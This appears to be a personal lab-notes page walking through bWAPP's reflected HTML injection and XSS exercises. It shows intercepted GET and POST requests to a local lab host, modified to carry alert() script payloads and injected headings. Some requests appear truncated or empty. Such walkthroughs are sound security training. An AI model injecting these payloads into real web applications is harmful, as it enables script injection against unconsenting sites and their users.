search

HTML Injection - XSS

hashtag
HTML Injection - Reflected (GET)

hashtag
Ask

First and Last Name

hashtag
Action

Intercept and add below to inject

<script>alert('Hello,world!');</script>

hashtag
Raw GET Request

GET /bWAPP/htmli_get.php?firstname=test&lastname=test&form=submit HTTP/1.1

Host: 172.16.57.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
 Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.57.129/bWAPP/htmli_get.php
DNT: 1
Connection: close
Cookie: PHPSESSID=u0dk36qhoj0ngbimoe9mdoov30; security_level=0
Upgrade-Insecure-Requests: 1

hashtag
Modified GET Request

GET /bWAPP/htmli_get.php?firstname=test&lastname=alert(&quot;Hello%20world!&quot;)&form=submit HTTP/1.1

NOTE: Need to use %20, it does not take spaces

hashtag
HTML Injection - Reflected (POST)

hashtag
Ask

First and Last Name

hashtag
Action

Burp intercept and add below to inject

hashtag
Raw POST Request

hashtag
Modified POST Request

firstname=test1&lastname=alert('Hello,World!');&form=submit

Note: Need to use %20, it does not take spaces

hashtag
HTML Injection - Reflected (URL)

hashtag
Ask

Your current URL: http://172.16.57.129/bWAPP/htmli_current_url.phparrow-up-right

hashtag
Action

Change the URL

hashtag
Raw GET Request

hashtag
Modified GET Request

/bWAPP/htmli_current_url.php#<h1>DefenderGB</h1><h2>Strikes_Again</h2><script>alert('Hello,World!');</script>

Note: You can’t use %20, it will pass as %20.

PreviousOWASP Broken Web Applications Project (BWA)NextNetwars

Last updated